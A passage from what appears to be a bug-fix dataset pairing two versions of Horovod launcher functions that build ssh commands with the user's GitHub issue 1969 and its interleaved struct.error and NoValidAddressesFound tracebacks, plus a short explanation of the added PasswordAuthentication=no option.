File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
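The only change between the two versions above is the added -o PasswordAuthentication=no ssh option: without it, a host that falls back to password authentication leaves the launcher blocked on a prompt, while with it the launch fails immediately and the error surfaces. A small self-contained illustration, assuming quote in the excerpt behaves like shlex.quote:

# Illustrates why PasswordAuthentication=no matters: it turns a silent hang
# (ssh waiting at a password prompt) into an immediate, visible failure.
# `quote` here is shlex.quote, assumed equivalent to the excerpt's helper.
import os
from shlex import quote


def build_remote_command(host, local_command, ssh_port=None):
    ssh_port_arg = "-p {ssh_port}".format(ssh_port=ssh_port) if ssh_port else ""
    # PasswordAuthentication=no: fail fast instead of prompting for a password.
    # StrictHostKeyChecking=no: do not block on an unknown-host-key prompt.
    return (
        "ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
        "{host} {ssh_port_arg} {cmd}".format(
            host=host,
            ssh_port_arg=ssh_port_arg,
            cmd=quote(
                "cd {pwd} > /dev/null 2>&1 ; {cmd}".format(
                    pwd=os.getcwd(), cmd=local_command
                )
            ),
        )
    )


print(build_remote_command("172.31.35.37", "ls", ssh_port=12345))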
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
"{host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
|
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
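Both versions above fan each rank's output out to the console and a per-rank file through a MultiFile wrapper. MultiFile's definition is not part of this excerpt; a minimal tee-style sketch of the file object it implies:

# Minimal tee-style file object in the spirit of the MultiFile wrapper used
# above (the real horovod class may differ): every write is fanned out to
# all the underlying streams.
import sys


class MultiFile(object):
    def __init__(self, files):
        self._files = files

    def write(self, text):
        for f in self._files:
            f.write(text)

    def flush(self):
        for f in self._files:
            f.flush()


with open("rank.0.stdout", "w") as log_file:
    out = MultiFile([sys.stdout, log_file])
    out.write("Process 0 exit with status code 0.\n")
    out.flush()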
def _check_all_hosts_ssh_successful(host_addresses, ssh_port=None):
"""
checks if ssh can successfully be performed to all the hosts.
:param host_addresses: list of addresses to ssh into. for example,
['worker-0','worker-1']
['10.11.11.11', '10.11.11.12']
:type host_addresses: list(strings)
:return: Returns True if all ssh was successful into all the addresses.
"""
def exec_command(command):
exit_code = 1
output_msg = ""
# Retry ssh up to SSH_ATTEMPTS times
for i in range(SSH_ATTEMPTS):
output = io.StringIO()
try:
exit_code = safe_shell_exec.execute(
command, stdout=output, stderr=output
)
if exit_code == 0:
break
output_msg = output.getvalue()
finally:
output.close()
return exit_code, output_msg
ssh_port_arg = "-p {ssh_port}".format(ssh_port=ssh_port) if ssh_port else ""
ssh_command_format = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no"
" {host} {ssh_port_arg} true"
)
args_list = [
[ssh_command_format.format(host=host_address, ssh_port_arg=ssh_port_arg)]
for host_address in host_addresses
]
ssh_exit_codes = threads.execute_function_multithreaded(exec_command, args_list)
ssh_successful_to_all_hosts = True
for index, ssh_status in ssh_exit_codes.items():
exit_code, output_msg = ssh_status[0], ssh_status[1]
if exit_code != 0:
print(
"ssh not successful for host {host}:\n{msg_output}".format(
host=host_addresses[index], msg_output=output_msg
)
)
ssh_successful_to_all_hosts = False
if not ssh_successful_to_all_hosts:
return None # we could return False here but do not want it to be cached
return True
|
def _check_all_hosts_ssh_successful(host_addresses, ssh_port=None):
"""
checks if ssh can successfully be performed to all the hosts.
:param host_addresses: list of addresses to ssh into. for example,
['worker-0','worker-1']
['10.11.11.11', '10.11.11.12']
:type host_addresses: list(strings)
:return: Returns True if all ssh was successful into all the addresses.
"""
def exec_command(command):
exit_code = 1
output_msg = ""
# Retry ssh up to SSH_ATTEMPTS times
for i in range(SSH_ATTEMPTS):
output = io.StringIO()
try:
exit_code = safe_shell_exec.execute(
command, stdout=output, stderr=output
)
if exit_code == 0:
break
output_msg = output.getvalue()
finally:
output.close()
return exit_code, output_msg
ssh_port_arg = "-p {ssh_port}".format(ssh_port=ssh_port) if ssh_port else ""
ssh_command_format = "ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} date"
args_list = [
[ssh_command_format.format(host=host_address, ssh_port_arg=ssh_port_arg)]
for host_address in host_addresses
]
ssh_exit_codes = threads.execute_function_multithreaded(exec_command, args_list)
ssh_successful_to_all_hosts = True
for index, ssh_status in ssh_exit_codes.items():
exit_code, output_msg = ssh_status[0], ssh_status[1]
if exit_code != 0:
print(
"ssh not successful for host {host}:\n{msg_output}".format(
host=host_addresses[index], msg_output=output_msg
)
)
ssh_successful_to_all_hosts = False
if not ssh_successful_to_all_hosts:
exit(1)
return True
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
